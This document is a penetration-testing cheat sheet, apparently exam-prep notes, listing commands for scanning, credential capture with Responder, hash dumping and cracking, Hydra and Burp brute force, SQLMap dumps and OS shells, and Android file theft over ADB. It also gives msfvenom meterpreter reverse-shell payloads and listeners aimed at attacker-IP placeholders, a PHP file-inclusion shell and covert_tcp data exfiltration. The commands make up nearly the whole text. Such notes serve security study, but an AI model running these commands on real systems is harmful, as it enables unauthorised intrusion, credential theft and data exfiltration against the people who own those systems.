Nmap
- Scan for a live host
nmap -sP <TARGET>
nmap -sn <TARGET>
- Scan for open ports
nmap -p --open <port> <TARGET>
- OS Detection
nmap -p --open <port> <TARGET>
- Comprehensive scan.
nmap -p- --open -vv -Pn <TARGET>
NetDiscover
- Perform an ARP scan across the entire network to identify live hosts.
netdiscover -i eth0
netdiscover -r <TARGET>
Wireshark
- Wireshark offers the capability to reconstruct a stream of plain text protocol packets into a format that is easily readable by humans
select_packet > follow > TCP Stream
- Filter by an specific HTTP Method
http.request.method == POST
http.request.method == GET
- Trace a DOS/DDOS attack
# Sort by packets in IPv4 based on number of the packets transfer
Statistics > Conversations > IPv4 > Packets
- Detect ARP Poisoning
Open Wireshark > Edit > Preferences > Protocols > ARP/RARP > Detect ARP Request Storms > Detect duplicate IP address > Start Capture > Analyze Expert information
CovertTCP
CovertTCP conceals transmission of data inside the IP header.
This can be used to analyze .cap files. It traverses through each line in Wireshark, targeting the identification field. Keep an eye on Hex value and ANSI value. Download and compile it.
# Compiling Covert_TCP.c
cc -o covert_tcp covert_tcp.c
Now, specify the reciever machine (Client_IP).
sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 9999 -dest_port 8888 -server -file recieve.txt
Specifying the attacker machine (Attacker_IP). Create the message file that will be need to be transfered (ex. secret.txt)
sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 8888 -dest_port 9999 -file secret.txt
The secret message is sent using Covert_TCP nad it is then captured using Wireshark.
LLMNR/NBT-NS Poisoning
The tool Responder servers as a rogue authentication server to capture hashes. Utilizing this method, one could obtain the password of a logged-in user who is attempting to access an unavailable shared resource.
- On Unix based systems
# where -I = interface
responder -I eth0
On Windows, you could try to access shared resources. Logs are stored at usr/share/responder/logs/SMB. You can crack the hash using John The Ripper.
john SMBfilename
SNMP Enumeration
- Performing SNMP Enumeration
# Scanning the port
nmap -sU -p 161 <TARGET_IP>
# Brute forcing SNMP
nmap -sU -p 161 --script=snmp-brute <TARGET_IP>
# Metasploit Modules
use auxiliary/scanner/snmp/snmp_login | set RHOSTS | exploit
use auxiliary/scanner/snmp/snmp_enum | set RHOSTS | exploit
Enum4Linux
- Performing Linux Enumeration.
Enum4linux [options] IP
enum4linux -u username -p password -U 10.10.10.12 | - u user -p pass -U get user list
enum4linux -u username -p password -o 10.10.10.12 | -o get OS info
enum4linux -u username -p password -P 10.10.10.12 | -P get password policy info
enum4linux -u username -p password -G 10.10.10.12 | -G get groups and members info
enum4linux -u username -p password -S 10.10.10.12 | -S get share list info
enum4linux -u username -p password -a 10.10.10.12 | -a get all simple enumeration data [-U -S -G -P -r -o -n -i]
MSFVenom
- Creating a payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=attacker_IP LPORT=attacker_Port -o filename.exe
- Creating a reverse connection
msfdb init && msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST = attacker-IP
set LPORT = attacker-Port
run
Dumping SAM Hashes
- Windows stores passwords in LM and NTLM hash formats. You need admin level access to dump them.
wmic useraccount get name,sid
- You can use Pwdump7 to dump the password hashes.
# dumps a protected file
pwdump7.exe -d C:\lockedfile.dat backup-lockedfile.dat
# show password hashes
pwdump.exe
# export hashes to the path defined
Pwdump7.exe > C:\hashes.txt
OPHCrack
- Cracks passwords no longer than 14 characters using only alphanumeric characters.
Open x86 GUI Version > Load PWDUMP > Select the hashes.txt file > Vista Free > Install it where OPHCrack files are placed
Winrtgen
- Creates Rainbow Tables.
Add Table > Hash NTLM > Min Length 4 > Max Length 6 > Chain Count 4000000 > CharSet LowerAlpha > Click Ok to start > Table is saved in Winrtgen folder
Rainbow Crack
- Cracking NTLM Hashes.
Open rcrack_gui.exe > File > Load NTLM Hashes from PWDUMP > Open Hashes.txt
Rainbow Table > Select Rainbow Table > Select Table created by Winrtgen > Crack
Phonesploit
- Installing Phonesploit.
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
# Alternative
python3 -m pip install colorama
- Running Phonesploit.
python3 phonesploit.py
- To establish a connection with a new phone, choose option 3 and press Enter. Alternatively, you can enter the IP of the Android device.
- Then choose option 4 to access shell on the phone
- Download desired files using option 9
sdcard/Download/secret.txt
ADB
- Installing ADB
apt-get update
sudo apt-get install adb -y
adb devices -l
- Establishing a connection
adb connect IP_ADDRESS:5555
adb devices -l
adb shell
- Navigation
pwd
ls
cd Download
ls
cd sdcard
- Download a file from an Android device using ADB
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt
adb pull sdcard/log.txt /home/mmurphy/Desktop
Hydra
hydra -l username -P passwords.txt target ssh
# If the service isn't running on the default port, use -s
hydra -l username -P passwords.txt ftp://target -s 221
# Use Get COMMAND to download a file
get file.txt .
hydra -l admin -P passwords.txt -o test.txt target telnet
NSLookup
You can use NSLookup to find the IP Address of a website.
nslookup www.example.com
WordPress
- List WordPress users using the public default REST API.
https://wordpress-site.com/wp-json/wp/v2/users/
Banner Grabbing
telnet www.moviescope.com 80
# Double enter
GET / HTTP/1.0
# Default banner grabbing
whatweb www.example.com
# Verbose grabbing
whatweb -v www.example.com
You can perform banner grabbing over SSL using OpenSSL.
# Install OpenSSL
sudo apt install openssl -y
openssl
s_client –host www.example.com -port 443
GET/HTTP/1.0
# HTTP Get request from a proxy
curl -x <proxy_IP>:8080 http://localhost/
Local File Inclusion
Create an PHP payload using msfvenom
msfvenom -p php/meterpreter/reverse_tcp lhost=attacker-ip lport=attacker-port -f raw
Create the Reverse Shell with Metasploit
msfconsole
use exploit/multi/handler
set payload php/meterepreter/reverse_tcp
set LHOST = attacker-ip
set LPORT = attcker-port
run
Web Spidering
You can perform web spidering using zaproxy.
Automated Scan > http://www.example.com > Attack > Active Scan > Spider Tab > Alerts > Spider > Messages
Burpsuite
- You can perform a brute force attack using Burpsuite.
# First, set up the Proxy.
Firefox Preferences > Proxy > Settings > Manual Proxy > 127.0.0.1 and Port 8080 > Check "Also use this proxy for FTP and HTTPS" > Ok
# Then fire up Burpsuite
Proxy > "Intercept On" > Switch to Firefox -> Go to the target website > Enter Random Credentials > Switch to Burpsuite
# Setting the payloads
Right click > Send to intruder > Intruder > Positions > Clear > Cluster bomb under Attack type
# Username and password payload
Select the username > Add Payload > Select the Password > Add Payload
# Go to the payload tab
Payloads Tab > Payload set: 1 and type: Simple list
# Under Payload options
Load > Select a wordlist like username.txt
# Do the same for the password
Payload set: 2 and type: Simple list > Under Payload options > Load > Select a wordlist like password.txt > Start attack
When finished, look at the status code of every attempt.
SQLMap
- List databases
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="Cookie"; --dbs
- Alternative
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="Cookie"; --data="id=1&Submit=Submit" --dbs
- Listing tables of a database name
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="Cookie"; -D database_name -T target_Table --columns
- Listing the columns of such table
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="Cookie"; -D database_name --tables
- Dump data
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="Cookie"; -D database_name -T target_Table --dump
- Setting OS Shell
sqlmap -u "http://domain.com/path.aspx?id=1" --cookie="Cookie"; ui-tabs-1=0 --os-shell
DLSS
Damn Small SQLi Scanner (DSSS) is a comprehensive tool designed for detecting SQL injection vulnerabilities. It is fully functional and capable of scanning both GET and POST parameters. Regarding optional configurations, it provides support for HTTP proxy along with HTTP header values such as User-Agent, Referer, and Cookie.
python3 dsss.py -u "URL" --cookie="cookie"
# Then open the generated URL
Snow
- Hide text
snow.exe -c -p test -m "Secret Message" original.txt hide.txt
- Unhide text
snow.exe -c -p test hide.txt
OpenStego
Perform image steganography. To hide data, follow the next steps.
- Select text message file which you want to hide
- Select the cover file image where data is to be hidden
- Set output path and file name
- Set password if needed
- Click Hide Data
To extract data
- Open the steganography file.
- Set the output folder path
- Enter the password
- Extract Data
HashCalc
- When opening the file, ensure MD5, SHA1, RIPEMD160 and CRC32 are selected. Then compare the hash after modiying the file.
CrypTool
- Data encryption with CrypTool.
# Encrypting file
File > New > Enter text > Encrypt > Symmetric (Modern) > RC2 > KEY 05 -> Encrypt
# Decrypting
File > Open > Decrypt > Symmetric (Modern) > RC2 > KEY 05 > Decrypt
MD5 Calculator
- Integrates with file explore. Right click any file and select MD5 Calculator to calculate its MD5 Hash.
# And some code
whoami
Keywords
- Image hidden > OpenStego
- File .hex > CrypTool
- Whitespace > Snow
- MD5 > HashCalc & MD5 Calculator
- Volume & Mount > VeraCrypt
Apache
- You can transfer local payloads to Windows using this way.
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /root/Desktop/filename /var/www/html/share/
service apache2 start
service apache2 status
- Then to download open a browser
attacker_ip/share
- Windows to Linux > File System > Network > smb//Windows_IP
SimpleHTTPServer
- Starts a simple HTTP server for file sharing
python -m SimpleHTTPServer